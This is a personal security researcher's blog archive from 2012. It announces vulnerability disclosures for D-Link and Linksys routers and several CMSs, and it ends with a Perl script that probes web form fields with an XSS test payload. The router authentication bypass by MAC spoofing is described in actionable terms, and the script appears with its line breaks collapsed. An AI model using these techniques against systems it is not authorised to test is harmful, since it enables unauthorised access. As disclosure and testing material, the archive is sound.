D-Link DSL-2640B Authentication Bypass

Posted on February 22, 2012

This router allows an attacker to bypass authentication and to login with administrator (“admin”) credentials. In fact when the administrator is logged in and an internal attacker will connect to web management interface (default is http://192.168.1.1:80) he will be able to see the MAC Address of logged admin. Symply changing his MAC Address the attacker can bypass authentication and login as administrator.

Fore more details

http://www.exploit-db.com/exploits/18511/
http://packetstormsecurity.org/files/110117/D-Link-DSL-2640B-Authentication-Bypass.html
http://www.securityfocus.com/bid/52129
http://xforce.iss.net/xforce/xfdb/73379
http://osvdb.org/79617
http://1337day.com/exploit/17562

ForkCMS 3.2.5 CSRF and XSS "0day" Vulnerabilities

Posted on February 22, 2012

Today I’ve discovered multiple vulnerability into Fork CMS 3.2.5. I think there are also this vulnerabilities in version 3.2.6.

To download my Original Advisory:
https://sites.google.com/site/ivanobinetti/ForkCMS%203.2.5%20CSRF%20and%20XSS%20vulnetabilities.txt?attredirects=0&d=1

Other pubblication related to these vulnerabilities:
http://packetstormsecurity.org/files/110048/ForkCMS-3.2.5-Cross-Site-Request-Forgery-Cross-Site-Scripting.html
http://www.exploit-db.com/exploits/18505/
http://secunia.com/advisories/48067
http://osvdb.org/show/osvdb/79444
http://xforce.iss.net/xforce/xfdb/73394
http://www.securelist.com/en/advisories/48067
www.1337day.com/exploits/17557

Cisco Linksys WAG54GS (ADSL Router) change admin password

Posted on February 21, 2012

Today I found a new “0day” vulnerability into Cisco Linksys WAG54GS Wifi Adsl Router and published related exploit in order to change default administrator (“admin”) password.

To view my Original Advisory:
Cisco Linksys WAG54GS CSRF Original Advisory

You can simply modify this exploit in order to change other router’s parameters.

PlumeCMS <= 1.2.4 CSRF "0day" Vulnerability

Posted on February 20, 2012

New “0day” vulnerability discovered regarding PluseCMS.

For more details:
http://osvdb.org/show/osvdb/80807
http://www.exploit-db.com/author/?a=3557
http://packetstormsecurity.org/files/author/9536/

D-Link DSL-2640B (ADSL Router) CSRF "0day" Vulnerability

Posted on February 20, 2012

I’ve discovered a new “0day” vulnerability:

To view my Original Advisory:
D-Link DSL-2640B CSRF (Change admin Password) Original Advisory

This vulnerability allows to change administrator password of D-Link DSL-2640B ADSL Router.

SyndeoCMS <= 3.0 CSRF "0day" Vulnerability

Posted on February 19, 2012

Today I’ve found a new “0day” vulnerability into Syndeocms 3.0 – and lower version – and I’ve created an exploit in order to automatically add an administrator account when the real administrator browses an “ad hoc” created web page containing a simple html/javascript code.

For more details:

http://www.exploit-db.com/author/?a=3557
http://packetstormsecurity.org/files/author/9536/

Some web sites which published my “0day” vulnerability:

http://1337day.com/exploits/17544
http://exploitsdownload.com/exploit/php/syndeocms-30-csrf-vulnerabili
http://www.allinfosec.com/2012/02/19/webapps-0day-syndeocms-3-0-csrf-vulnerability/
http://www.silobreaker.com/webapps–syndeocms-lt-30-csrf-vulnerability-5_2265494154572201984
http://eternal-todo.com/aggregator/categories/1
http://www.morningstarsecurity.com/news
http://unsecure-os.org/index.php/exploits
http://securit.se/it-sakerhetsnyheter/
http://cxsecurity.com/
http://www.bugsearch.net/

SocialCMS CSRF "0day" Vulnerability

Posted on February 17, 2012

Yestarday I found a “0day” vulnerability into latest version (1.0.2) of “Socialcms” cms (socialcms.com) and created an exploit in order to add an Administrator account. The vulnerability and related exploit have been published into Offensive Security Exploit Database. You can find more details here:

http://www.exploit-db.com/author/?a=3557

Other web site have published this “oday” vulnerability:

http://www.allinfosec.com/2012/02/16/webapps-0day-socialcms-csrf-vulnerability
http://www.1337day.com/exploits/17527
http://www.realhacker.net/tag/webapps
http://94hi.com/exploit/html/3244.html

Discovering Cross Site Scripting (XSS) vulnerabilities

Posted on January 27, 2012

Today I wrote a simple perl script to automatically discover XSS vulnerabilities into a web application.

This script can be improved in order to make it more suitable to be used in a web penetration test.

Following the code:

#!/usr/bin/perl use strict;use LWP::Simple;my ($url, $webpage, @webpage, @name, $result); if(@ARGV < 1) { usage();} #Get web page specified by cmd$webpage = get("http://" . $ARGV[0]); #Split variable into an arry@webpage = split(/\n/, $webpage); #Parsing Web Page to obtain names of "input type=text" foreach (@webpage) {  if($_ =~ /input\stype="text"\sname="(\w{1,30})"/) {    push(@name, $1);      }} #Print found search boxif(@name) { print "I've found the following search box:\n";   foreach (@name) {   print "$_\n"; } print "and I've discovered that:\n"; #Automatically exploit search box to verify XSS vulnerabilities foreach (@name) {   $result = get("http://" . $ARGV[0] . "?" . $_ . "=<script>alert('test_XSS')</script>");   if($result =~ /<script>alert\('test_XSS'\)<\/script>/) {     print "$_ is vulnerable to XSS\n";   }      else { print "$_ isn't vulnerable to XSS\n";} }} else {  print"I have not found search boxes in " . $ARGV[0] . "\n";} sub usage() { print"Usage: ".$0." <url>\n"; print "Example: " . $0 . " ivanobinetti.com\n"; exit;}

Ivano Binetti

Personal Blog

Category Archives: Web Vulnerabilities